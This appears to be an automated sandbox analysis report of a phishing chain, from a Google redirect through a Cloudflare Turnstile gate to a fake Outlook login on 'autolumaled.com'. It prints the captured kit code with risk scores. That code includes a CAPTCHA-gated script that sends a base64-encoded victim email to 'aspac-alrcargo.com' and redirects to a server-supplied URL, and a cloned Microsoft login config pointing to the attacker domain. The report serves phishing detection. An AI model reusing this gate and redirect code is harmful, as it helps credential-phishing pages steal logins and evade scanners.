Windows Analysis Report
https://google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=152c27645d86ba0833d5001d33047642wDnNeW8yycT&sa=t&esrc=nTgV8F152c27645d86ba0833d5001d33047642A0xys8Em2FL&source=&cd=tS6T8152c27645d86ba0833d5001d33047642Tiw9XH&cad=JxWzDfBP152c27645d86ba0833d5001d33047642VS0Y&ved=x

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false,
    "reasoning": "This is a legitimate Google domain for Vietnam (.vn). Google maintains country-specific domains, and .vn is the official top-level domain for Vietnam."
}

URL: https://google.com.vn

{
    "risk_score": 5,
    "reasoning": "The script contains a mix of behaviors, some of which are low-risk (e.g., CAPTCHA handling) and others that require further review (e.g., encrypted user agent data transmission). The overall risk is in the medium range, and the script should be analyzed more closely to determine the full extent of its functionality and potential impact."
}

    var verifyCallback_CF = function (response) {
      if (response && response.length > 10) {
        sendRequest(); // Only send the request after CAPTCHA is solved
      }
    };

    window.onloadTurnstileCallback = function () {
      turnstile.render("#turnstileCaptcha", {
        sitekey: "0x4AAAAAAA5Vi5ptLVedHwH9", 
        callback: verifyCallback_CF,
      });
    };

    function hh2(encryptedText, shift) {
      let decryptedText = "";
      for (let i = 0; i < encryptedText.length; i++) {
        let c = encryptedText[i];
        if (c.match(/[a-z]/i)) {
          let code = encryptedText.charCodeAt(i);
          if ((code >= 65) && (code <= 90)) {
            c = String.fromCharCode(((code - 65 - shift + 26) % 26) + 65);
          } else if ((code >= 97) && (code <= 122)) {
            c = String.fromCharCode(((code - 97 - shift + 26) % 26) + 97);
          }
        }
        decryptedText += c;
      }
      return decryptedText;
    }

    function Encrypt(text, publicKey) {
      console.log('encrypt with public key:', publicKey);
      return text; 
    }

    let sx = "https://aspac-alrcargo.com/?eawkysbj&qrc=bWlzdHkuYWxuYWhhb2lAdGV4YW5hY2VudGVyLmNvbQ==";

    const PUBLIC_KEY = `-----BEGIN PUBLIC KEY-----
    MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxCJBwcY8t0AqPquU+Ah1
    R0EPWlcD5XSXhOEe00844TkiGLFHnMWQEugh0zYh/kgrw8hv1ifOmf4Jrkis3tlW
    qpIO2U9Nle23D1VKpxZSxRyYTbnoyq3lRcqY5txOJKdviR9fA9wPidS6KTXhX2xq
    wq1jjYvgHtntEGYwK6Lzm6Q8jTjfV7ICqnV74GTKnPN7VMDKsS2+Dcf2Y2IoYY1o
    NM7nWPKFeVUmkqFMowkdBmGJHL4UqRcxbhiRX3AAzzdQvbQg7OQxYjbKak23IvDN
    1ia9SsXQyo5H/XnfXB2Nb9sNayO5sV+hDmBRlujtm1+maqGMJUXZeVHL81Q7O22a
    WQIDAQAB
    -----END PUBLIC KEY-----`;

    function sendRequest() {
      const userAgent = navigator.userAgent;
      const EncryptedUserAgent = Encrypt(userAgent, PUBLIC_KEY);
      console.log('Sending request with encrypted user-agent:', EncryptedUserAgent);
      
      let xhr = new XMLHttpRequest();
      xhr.open('GET', sx, true);
      xhr.setRequestHeader("accept", "application/json");
      xhr.setRequestHeader("qrc-auth", EncryptedUserAgent);

      xhr.onreadystatechange = function() {
        if (xhr.readyState === XMLHttpRequest.DONE) {
          if (xhr.status === 200) {
            const cc = JSON.parse(xhr.responseText);
            if (cc.url) {
              window.location = cc.url;
            } else {
              document.body.innerHTML = cc.error ? cc.error : 'ACCESS DENIED';
            }
          } else {
            document.body.innerHTML = 'CONNECTION TO HOST FAILED';
          }
        }
      };
      xhr.send();
    }
  

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate and common practice for web security. The script sets up various configuration options for the Cloudflare challenge and handles communication between the parent window and the challenge widget. While it uses some dynamic behavior, such as `postMessage()` and event listeners, the overall intent seems to be for a legitimate security challenge rather than malicious activity. Therefore, the risk score is assessed as low."
}

        (function(){
            window._cf_chl_opt={
                cvId: '3',
                cZone: 'challenges.cloudflare.com',
                cTplV: 5,
                chlApivId: '0',
                chlApiWidgetId: 'kbzhd',
                chlApiSitekey: '0x4AAAAAAA5Vi5ptLVedHwH9',
                chlApiMode: 'managed',
                chlApiSize: 'normal',
                chlApiRcV: 'TUuYPEmTGsdbpIgNhMQNZb_rY55qJpp6Kbroaz4uK8M-1736976828-1.3.1.1-qVDRcaAvXxcSu.0h02zPjB_fpd6mUDJgcLMrb1us7zQ',
                chlApiTimeoutEncountered: 0,
                chlApiOverrunBudgetMs:10000,
                chlTimeoutMs:120000,
                cK:[],
                cType: 'chl_api_m',
                cRay: '9028fc7bbc8742f7',
                cH: '330o0BA3NzJOYLQkQNRkU8MPAY01ciHNyYKgLYrodX4-1736976828-1.1.1.1-DtaUrylRSmcIK2ogcg8Tcsix2C7cnLnAsJBjThR3fz84ljl1.bBLbcy3hzazKXI8',
                cFPWv: 'b',
                cLt: 'n',
                chlApiFailureFeedbackEnabled:true,
                chlApiLoopFeedbackEnabled:false,
                wOL:false,
                wT: 'auto',
                wS: 'normal',
                md: '9fcvCDlOfYJDy8xn3DgYvy2H.Jclsw7Bk399ABhndJE-1736976828-1.1.1.1-D_fJP4kldRuEoHnrvC9Vt_t9goxaQ3.IX6zBu1qTSFRtsG5gefaLYQcbJVII6935apaD1HtyGdVnVsYWa1XM.Lvvk14vyY8Nddz2fzP6CYOhc4j4lSWW2rSy_q9hPOrOSyTxx.tCjEYyIa6mBbOB.nBpXd.JnhodRhe0zqCg5SLMqo5DZ0g4QksOMkHFEDHPaDJG1gSsC3Ocmhr4zsrPBoleuP8G5LztuubIsq6oE94gBVj_YkObZF_0m3B7HtKC47XpCjNgHp3VosYGsgAtTugPME006atW3iZlWcuCN54wdl0j070Wkgv4wIShMz3HQOT_laCmlEJX7WP66hNlTz2Jv..CuvHcUXHz2PtN1pbCG6z3SQf9M_JoQCO4ed.DOKL0k.t3RMPBW3CDuVxBYDBkCv9_YpvfFAdMkE_quL6KbHbfRfy0zKrlW3UNrr_aDpt3tP1n8OEnLAGB.keWn7y28SXvLbj04VimS8kvEEBv_bZqRX_73hTKRxdJ1JpHHBqL97fbkrq11uV5xlLDLe2AURPNMzZIGw2yMvmZ_pqPlkxCo.eoVsng1JbxdWvbC9kjwgQQ_H76snipDxkJAKlsh60dLL2MivXvEi_13SPtE6.MaGQwmdUWo.nux6ialstS9sGH7uUl9vUT6kYnnngIq7Kq69XSFWzeI8AaNjXxXYj7Q3Uci75FiODvtDSpgddHtIsB81iIsdP7RBLDginupBlJ64V3JVDlMQyuNZ2L3Mpy0a6a2xAvCme0zZZ.Uhb00vSUUpur8QaJwN93W.eWr6mWD3oMRCclQ55SVa1P17RZgXMeVJOTxGeLMq3eN_Dk3J9nwDy6jmEylGTrHbCwnwpRYdYo24zNRZ3L0t.BXgvHO0kBr9lvigjghnf61NVEzz0cODInLnfw753ia8Jh8CDTRvYvETm8wGzxksPOFH7rxVSTWTcz8eYT8HQ6eWXE2gBxj1DyxAvjL87KlSXx6VFqRyPNX1T_3Cgmwdh7Lq6e_ihB7zVQf4MqFZibLnEIy2VFK0Mn6UsE5iHs4JE70mRLeGlbhqCtKQJC1u5nvUYjXXQ3JlaWPWFZXFCd6cCKntdTDof971t61kyOqt2icON5Lzy10jjlb6bp1IdVSIkO5TvPEbBmS33ZTNamgNCKCkp1EQyJCiKGvrB4a132uZr0.cdFMX41Vk1DsX0hHYyJzLEqlQctN9aO.FIklDb4HxWKdyT2V685yKfj1reVtADAnAXR8rCnEdcEjqQ2to4ItTlwn63KBEyCetMYWqPRMfizIJC1I1Fg9DLKQ_sNjIXnfbVFTf1XtIFOg3jU3CWXcPENF_caFX4VOkDtCYDfE1SkrLyVDpzjYOlf8MLbVKi8rMKONIU2jBx1pMWDA2c3SBQ1NUi06JR92DQ9gEDv1gEUNAtpScgG2M3FfK89iwr6GoNDXwrNQxQAV9Q',
                cITimeS: '1736976828',
                refresh: function(){
                    if(window['parent']){
                        window['parent'].postMessage({
                            source: 'cloudflare-challenge',
                            widgetId: 'kbzhd',
                            nextRcV: 'TUuYPEmTGsdbpIgNhMQNZb_rY55qJpp6Kbroaz4uK8M-1736976828-1.3.1.1-qVDRcaAvXxcSu.0h02zPjB_fpd6mUDJgcLMrb1us7zQ',
                            event: 'reloadRequest',
                        }, "*");
                    }
                }
            };
            var handler = function(event) {
                var e = event.data;
                if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
                    if(window['parent']){
                        window['parent'].postMessage({
                            source: 'cloudflare-challenge',
                            widgetId: window._cf_chl_opt.chlApiWidgetId,
                            event: 'food',
                            seq: e.seq,
                        }, '*');
                    }
                }
            }
            window.addEventListener('message', handler);
        }());
    

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other automated threats. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscated code. It primarily handles the Cloudflare challenge functionality, including translations, polyfills, and other related operations. While the script uses some moderate-risk indicators like external data transmission and aggressive DOM manipulation, these are likely necessary for the Cloudflare challenge to function properly. Additionally, the script is interacting with known, reputable Cloudflare domains, which reduces the overall risk. Therefore, the final risk score is assessed as 3, indicating a low-risk script."
}

window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"testing_only":"Testing%20only.","turnstile_footer_privacy":"Privacy","turnstile_failure":"Error","turnstile_feedback_report":"Having%20trouble%3F","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_refresh":"Refresh","turnstile_verifying":"Verifying...","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_expired":"Expired","human_button_text":"Verify%20you%20are%20human","turnstile_timeout":"Timed%20out","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_feedback_description":"Send%20Feedback","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_overrun_description":"Stuck%20here%3F","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_success":"Success%21","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_footer_terms":"Terms"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eT,eU,fk,fl,fp,fq,fr,fu,fx,fz,fA,fB,fN,fZ,g5,g6,g7,gh,gs,gw,gD,gH,eR,eS){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1783))/1*(-parseInt(gI(731))/2)+-parseInt(gI(1472))/3*(-parseInt(gI(1717))/4)+parseInt(gI(705))/5*(parseInt(gI(559))/6)+-parseInt(gI(1147))/7*(-parseInt(gI(1706))/8)+parseInt(gI(555))/9*(parseInt(gI(1004))/10)+-parseInt(gI(913))/11*(-parseInt(gI(666))/12)+-parseInt(gI(1299))/13,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,101272),eM=this||self,eN=eM[gJ(572)],eM[gJ(588)]=function(c,gU,e){e=(gU=gJ,{'nFDvz':function(g,h){return g(h)},'gkOBu':gU(1193)});try{return e[gU(1754)](eQ,c)}catch(g){if(e[gU(1563)]!==e[gU(1563)])g[gU(1095)][gU(1583)]();else return eO(e[gU(1754)](eP,c))}},eR=[],eS=0;256>eS;eR[eS]=String[gJ(1403)](eS),eS++);gH=(eT=(0,eval)(gJ(1461)),eU=atob(gJ(799)),fk={},fk[gJ(1696)]='o',fk[gJ(636)]='s',fk[gJ(632)]='u',fk[gJ(658)]='z',fk[gJ(994)]='n',fk[gJ(810)]='I',fk[gJ(717)]='b',fl=fk,eM[gJ(552)]=function(g,h,i,j,hw,o,x,B,C,D,E,F,H,I,J){if(hw=gJ,o={'IQKCq':function(G,H){return G===H},'tnOhg':function(G,H){return G+H},'CPXmn':function(G,H){return G^H},'JEQiw':function(G,H){return H^G},'epDMP':function(G,H){return G(H)},'pMWBt':function(G,H){return G<H},'oWjIC':hw(660),'GLrIU':function(G,H,I){return G(H,I)},'LftWn':function(G,H,I){return G(H,I)},'KyyCz':function(G,H){return G+H}},null===h||h===void 0)return j;for(x=o[hw(1740)](fo,h),g[hw(817)][hw(585)]&&(x=x[hw(1176)](g[hw(817)][hw(585)](h))),x=g[hw(1816)][hw(1434)]&&g[hw(1530)]?g[hw(1816)][hw(1434)](new g[(hw(1530))](x)):function(G,hy,H){for(hy=hw,G[hy(1468)](),H=0;H<G[hy(837)];o[hy(569)](G[H],

{
  "contains_trigger_text": true,
  "trigger_text": "Please stand by, while we are checking if the site connection is secure\nWe need to review the security of your connection before proceeding.",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": true,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true,
    "reasoning": "This URL uses Cloudflare Workers (.workers.dev domain), which is a legitimate service but can be misused. The long hexadecimal-like subdomain (3a84bd6a.82e4c7deb867f162b7c6c8d3) is suspicious and could be dynamically generated. Third-party hosting through Cloudflare Workers indicates potential for abuse."
}

URL: https://3a84bd6a.82e4c7deb867f162b7c6c8d3.workers.dev

{
  "brands": [
    "Cloudflare"
  ]
}

```json
{
    "risk_score": 3,
    "reasoning": "The script contains obfuscated code, which is a high-risk indicator. However, there are no clear signs of malicious behavior such as data exfiltration or dynamic code execution. The obfuscation could be for legitimate purposes like protecting intellectual property."
}

"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun

{
    "risk_score": 7,
    "reasoning": "This script demonstrates several high-risk behaviors, including data exfiltration and potential redirection to an untrusted domain. The script checks if it is running in an iframe and, if not allowed, attempts to redirect the top-level window to a URL containing an 'iframe-request-id' parameter. This behavior could be used for phishing or other malicious purposes, and the use of obfuscated code and unknown domains increases the risk."
}

//<![CDATA[
!function(){var e=window,s=e.document,i=e.$Config||{};if(true){s&&s.body&&(s.body.style.display="block")}else if(!i.allowFrame){var o,t,r,f,n,d;if(i.fAddTryCatchForIFrameRedirects){try{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f||r&&f>t?"?":"&",o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}catch(e){}}else{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f||r&&f>t?"?":"&",
o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}}}();
//  

{
    "risk_score": 6,
    "reasoning": "The script appears to be a configuration object for a web application, but it contains some concerning behaviors that require further investigation. The script interacts with external domains like 'autolumaled.com' and 'login.live.com', which could potentially be used for data exfiltration or other malicious activities. Additionally, the script includes a large amount of obfuscated data, which is a common tactic used to hide malicious code. While the script may have legitimate purposes, the combination of external data transmission and obfuscation warrants a medium-risk score for further review."
}

//<![CDATA[
$Config={"fShowPersistentCookiesWarning":false,"urlMsaSignUp":"https://autolumaled.com/owa/","urlMsaLogout":"https://login.live.com/logout.srf?iframed_by=https%3a%2f%2fautolumaled.com","urlOtherIdpForget":"https://login.live.com/forgetme.srf?iframed_by=https%3a%2f%2fautolumaled.com","showCantAccessAccountLink":true,"urlGitHubFed":"https://autolumaled.com/owa/?idp_hint=github.com","arrExternalTrustedRealmFederatedIdps":[],"fShowSignInWithGitHubOnlyOnCredPicker":true,"fEnableShowResendCode":true,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Belgium~32!!!BZ~Belize~501!!!BJ~Benin~229!!!BM~Bermuda~1!!!BT~Bhutan~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia and Herzegovina~387!!!BW~Botswana~267!!!BR~Brazil~55!!!IO~British Indian Ocean Territory~246!!!VG~British Virgin Islands~1!!!BN~Brunei~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Cambodia~855!!!CM~Cameroon~237!!!CA~Canada~1!!!KY~Cayman Islands~1!!!CF~Central African Republic~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Christmas Island~61!!!CC~Cocos (Keeling) Islands~61!!!CO~Colombia~57!!!KM~Comoros~269!!!CG~Congo~242!!!CD~Congo (DRC)~243!!!CK~Cook Islands~682!!!CR~Costa Rica~506!!!CI~Cte d\u0027Ivoire~225!!!HR~Croatia~385!!!CU~Cuba~53!!!CW~Curaao~599!!!CY~Cyprus~357!!!CZ~Czechia~420!!!DK~Denmark~45!!!DJ~Djibouti~253!!!DM~Dominica~1!!!DO~Dominican Republic~1!!!EC~Ecuador~593!!!EG~Egypt~20!!!SV~El Salvador~503!!!GQ~Equatorial Guinea~240!!!ER~Eritrea~291!!!EE~Estonia~372!!!ET~Ethiopia~251!!!FK~Falkland Islands~500!!!FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Greece~30!!!GL~Greenland~299!!!GD~Grenada~1!!!GP~Guadeloupe~590!!!GU~Guam~1!!!GT~Guatemala~502!!!GG~Guernsey~44!!!GN~Guinea~224!!!GW~Guinea-Bissau~245!!!GY~Guyana~592!!!HT~Haiti~509!!!HN~Honduras~504!!!HK~Hong Kong SAR~852!!!HU~Hungary~36!!!IS~Iceland~354!!!IN~India~91!!!ID~Indonesia~62!!!IR~Iran~98!!!IQ~Iraq~964!!!IE~Ireland~353!!!IM~Isle of Man~44!!!IL~Israel~972!!!IT~Italy~39!!!JM~Jamaica~1!!!JP~Japan~81!!!JE~Jersey~44!!!JO~Jordan~962!!!KZ~Kazakhstan~7!!!KE~Kenya~254!!!KI~Kiribati~686!!!KR~Korea~82!!!KW~Kuwait~965!!!KG~Kyrgyzstan~996!!!LA~Laos~856!!!LV~Latvia~371!!!LB~Lebanon~961!!!LS~Lesotho~266!!!LR~Liberia~231!!!LY~Libya~218!!!LI~Liechtenstein~423!!!LT~Lithuania~370!!!LU~Luxembourg~352!!!MO~Macao SAR~853!!!MG~Madagascar~261!!!MW~Malawi~265!!!MY~Malaysia~60!!!MV~Maldives~960!!!ML~Mali~223!!!MT~Malta~356!!!MH~Marshall Islands~692!!!MQ~Martinique~596!!!MR~Mauritania~222!!!MU~Mauritius~230!!!YT~Mayotte~262!!!MX~Mexico~52!!!FM~Micronesia~691!!!MD~Moldova~373!!!MC~Monaco~377!!!MN~Mongolia~976!!!ME~Montenegro~382!!!MS~Montserrat~1!!!MA~Morocco~212!!!MZ~Mozambique~258!!!MM~Myanmar~95!!!NA~Namibia~264!!!NR~Nauru~674!!!NP~Nepal~977!!!NL~Netherlands~31!!!NC~New Caledonia~687!!!NZ~New Zealand~64!!!NI~Nicaragua~505!!!NE~Niger~227!!!NG~Nigeria~234!!!NU~Niue~683!!!NF~Norfolk Island~672!!!KP~North Korea~850!!!MK~North Macedonia~389!!!MP~Northern Mariana Islands~1!!!NO~Norway~47!!!OM~Oman~968!!!PK~Pakistan~92!!!PW~Palau~680!!!PS~Palestinian Authority~970!!!PA~Panama~507!!!PG~Papua New Guinea~675!!!PY~Paraguay~595!!!PE~Peru~51!!!PH~Philippines~63!!!PL~Poland~48!!!PT~Portugal~351!!!PR~Puerto Rico~1!!!QA~Qatar~974!!!RE~Runion~262!!!RO~Romania~40!!!RU~Russia~7!!!RW~Rwanda~250!!!BL~Saint Barthlemy~590!!!KN~Saint Kitts and Nevis~1!!!LC~Saint Lucia~1!!!MF~Saint Martin~590!!!PM~Saint Pierre and Miquelon~508!!!VC~Saint Vin

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a script for prefetching resources, likely for an Office 365 application. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscated code/URLs. The script is interacting with known, reputable domains (office365.com) and is likely performing legitimate analytics or telemetry functionality. While it uses some legacy practices like `XDomainRequest`, the overall risk is low, and the script seems to be a benign resource prefetching mechanism."
}

        var pf = (function(){function h(n){for(var r=n+"=",u=document.cookie.split(";"),t,i=0;i<u.length;++i){for(t=u[i];t.charAt(0)==" ";)t=t.substring(1,t.length);if(t.indexOf(r)==0)return t.substring(r.length,t.length)}return null}function c(n,t){document.cookie=n+"="+t+"; path=/"}function l(n){for(var r={p:""},u=n.split("&"),i,t=0;t<u.length;t++)i=u[t].split(":"),r[i[0]]=i[1];return r}function a(n){var i="",t;for(t in n)i+=t+":"+n[t]+"&";return i}function f(t){n&&(n.p+=t?"1":"0",c(r,a(n)))}function s(n){if(i&&n<i.length){var t=document.createElement("span");t.setAttribute("style","font-family:'"+i[n]+"';color:transparent;");t.innerText="A";document.body.appendChild(t);f(!0);setTimeout(function(){s(n+1)},10)}}function e(n,i){if(t&&n<t.length){var u=t[n],r;r=document.createElement("link");r.setAttribute("href",u);r.setAttribute("rel","stylesheet");r.onload=function(){f(!0);e(n+1,i)};r.onerror=function(){f(!1);e(n+1,i)};document.head.appendChild(r)}else i()}function v(f,o,c){r=f;u=h(r);t=o;i=c;u&&(n=l(u));window.onload=function(){e(0,function(){s(0)})}}var r,u,t,i,n,o;return String.prototype.endsWith=function(n){return this.match(n+"$")==n},n={},o={},o.prefetch=v,o})()
            pf.prefetch("OWAPF", ['https://r4.res.office365.com/owa/prem/15.20.8356.13/scripts/boot.worldwide.0.mouse.js','https://r4.res.office365.com/owa/prem/15.20.8356.13/scripts/boot.worldwide.1.mouse.js','https://r4.res.office365.com/owa/prem/15.20.8356.13/scripts/boot.worldwide.2.mouse.js','https://r4.res.office365.com/owa/prem/15.20.8356.13/scripts/boot.worldwide.3.mouse.js','https://r4.res.office365.com/owa/prem/15.20.8356.13/resources/images/0/sprite1.mouse.png','https://r4.res.office365.com/owa/prem/15.20.8356.13/resources/images/0/sprite1.mouse.css','https://r4.res.office365.com/owa/prem/15.20.8356.13/resources/styles/0/boot.worldwide.mouse.css'], ['office365icons']);
    

{
    "risk_score": 2,
    "reasoning": "This script appears to be a polyfill for the Promise API, which is a common and legitimate practice. It does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or obfuscation. The script is well-documented and licensed under the public domain, indicating it is likely a trusted and widely-used utility. While it uses some moderate-risk practices like external data transmission and fallback domains, these are common in modern web development and do not appear to be used for malicious purposes. Overall, this script poses a low risk and is likely a benign utility."
}

/*!
 * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
 * 
